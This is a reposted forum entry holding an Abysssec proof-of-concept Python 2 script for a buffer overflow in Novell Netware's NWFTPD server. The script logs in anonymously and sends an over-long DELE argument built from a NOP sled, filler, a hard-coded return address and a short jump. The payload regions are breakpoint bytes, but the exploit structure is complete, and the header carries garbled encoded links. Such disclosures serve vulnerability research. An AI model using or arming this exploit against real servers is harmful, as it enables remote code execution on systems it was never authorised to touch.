[推荐][转帖]MOAUB #7 - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
发表于: 2010-9-9 10:54 3796
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < Day 7 - (Binary Analysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
8b1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2^5M7r3I4G2K9i4c8Q4x3X3c8V1j5W2)9J5k6h3y4G2L8g2)9J5c8X3#2G2j5i4g2T1i4K6u0V1y4#2)9J5k6r3&6G2N6X3g2D9L8q4)9J5k6r3&6W2N6s2N6S2M7X3g2Q4x3X3c8F1N6$3k6@1M7r3c8Q4x3X3c8J5L8h3c8J5L8X3k6J5k6r3g2D9k6g2)9J5k6r3q4J5k6%4g2E0k6h3&6@1i4K6u0V1M7r3q4J5M7$3W2F1k6#2)9J5k6r3u0#2k6X3k6W2M7W2)9J5k6r3!0$3k6i4u0X3L8r3!0%4i4K6u0r3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
'''
'''
Title : Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow
Version : NWFTPD.NLM 5.09.02 (Netware 6.5 SP8)
Analysis : 1e1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3q4T1P5i4y4K6M7$3g2U0i4K6u0W2j5$3!0E0i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
Vendor : 2baK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6f1&6G2N6X3g2D9L8q4)9J5k6h3y4G2L8g2)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7
Impact : Critical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
'''
from ftplib import FTP
import sys
# Proof-of-concept trigger for the DELE variant of the NWFTPD argument-parsing
# overflow named in the header. Written for Python 2 (`except Exception,err`,
# `print err`). Both "shellcode" regions are filled with 0xCC (x86 INT3), so
# the script carries no working payload; it only shows an over-long path
# argument being sent to the server.
try:
    # Target address is hard-coded to loopback.
    netwareServerIp = '127.0.0.1'
    ftp = FTP(netwareServerIp)
    # The command is issued from an anonymous session.
    # NOTE(review): whether the vulnerable handler is reachable only after
    # login is not shown here; if it is, disabling anonymous FTP limits
    # exposure to holders of valid credentials. Confirm against the advisory.
    ftp.login('anonymous','a@a')
    # Path argument, assembled in order: 1 + 107 + 413 + 4 + 124 + 6 = 655 bytes.
    # Defender note: a DELE/RMD/RNFR argument of this length, carrying runs of
    # 0x90/0xCC and other non-printable bytes, is anomalous for a file path and
    # is a reasonable basis for a length/content rule on FTP traffic.
    buffer = "/"
    buffer += "\x90"*107 #nops
    # 0xCC filler standing in for a payload (breakpoint bytes only).
    buffer += "\xcc"*413 #shellcode part2 = 413 byte
    # Four bytes the author places over the saved return address. Per the
    # author's comment the value is an address inside nwftpd.nlm, so it is
    # presumably tied to the build listed in the header (5.09.02) - confirm.
    buffer += "\xb9\xa4\xe0\x91" #EIP - jmp esp from nwftpd.nlm module
    # Second 0xCC filler region.
    buffer += "\xcc"*124 #shellcode part1 = 124 byte
    # Six trailing bytes; the description below is the author's own.
    buffer += "\x08\xeb\x90\x90\x90\x90" #short jmp to shellcode part2
    # ftplib's voidcmd sends the line and raises unless the reply is 2xx; a
    # connection dropped by the server also surfaces as an exception here.
    ftp.voidcmd('DELE ' + buffer)
# Any failure (connect, login, error reply, dropped connection) is printed and
# swallowed. The FTP connection is never closed explicitly.
except Exception,err:
    print err